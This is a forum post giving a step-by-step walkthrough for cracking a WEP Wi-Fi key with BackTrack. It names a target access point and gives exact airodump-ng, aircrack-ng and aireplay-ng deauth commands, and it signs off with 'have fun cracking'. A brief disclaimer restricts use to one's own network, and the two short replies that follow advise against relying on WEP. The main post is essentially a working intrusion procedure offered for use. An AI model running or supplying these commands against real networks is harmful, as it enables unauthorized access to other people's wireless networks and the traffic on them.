Hi all, I was able to figure out how to crack a WEP key fairly easily. Make a note that this is for informational use only, and to test the security of your own wireless access point. I did this using an Acer Ferrari 5000 which uses an Atheros A/B/G wireless chipset (model AR5006EXS). Most linux distros I've used didn't have wireless drivers for my device, but this distro easily found and enabled my device.

1. Download BackTrack .iso here http://www.remote-exploit.org/backtrack_download.html - it will take a while but once you have the .iso file, you can use Nero (burn image) to create a bootable CD.
2. Take a minute to ensure that your wireless card is turned on in Vista or XP. If your laptop has a switch to turn it on or off, make sure it's turned on.
3. Reboot, insert CD, hit F12 for boot menu, start from CD.
4. At the prompt, Boot Linux <enter>
5. Log into BackTrack root/toor
6. start root shell
7. Find the program Kismet and start it to find active WAP's - copy SSID, mac address, and channel of target WAP you want to crack. In my case, Kismet enabled monitor mode on ath1 - do not close the app.
8. in the root shell type in # mkdir /home/dump/
9. # cd /home/dump/
   
10. Now we want to start dumping encrypted packets. To do so, type in # airodump-ng -i -c 6 -b g ath1 -w /home/dump/dump1

This can take a long time; in my case, overnight, with a lot of traffic from multiple machines, I was able to capture 912075 IV's. The more captured packets, the easier it will be to crack the key. If you're unsure what the command line switches are used for, type in # man airodump-ng at the command prompt. You can see from my statement I am dumping packets captured on channel 6, using band G, using ath1 ethernet contoller and dumping the results to a file named dump1 in the directory we created.

    11. hit Ctrl+C to stop the capture.

    12. Now we want to crack the key. At the root shell command prompt type in # aircrack-ng -b MAC_ADDRESS_OF_TARGET_WAP -n 128 /home/dump/dump1-01.ivs

           It may take a little while but aircrack-ng will tell you if it doesn't have enough captured packets. I guessed that (-n 128) the WAP is using 128 bit encryption. If it was 64 bit I would have used (-n 64).

If you don't have enough packets, and you're not capturing them quick enough, you may want to use a second laptop booted to BackTrack and run "aireplay-ng" while your first laptop is capturing packets. This is used to create traffic using a deauth attack I believe. An example of  a command that's worked for me is # aireplay-ng ath1 -2 -b MAC_ADDRESS_OF_TARGET -m 68 -n 68 -d ff:ff:ff:ff:ff:ff . 

Good luck and have fun cracking!  

You shouldn't even use WEP if possible....I suppose it's better than nothing D:

It at least means that it takes some effort to get access, thus making the unsecured network down the road more attractive than yours.

If someone really wants access to your specific network for some reason, then they're going to get in eventually... although a better encryption would discourage them further and make it take longer.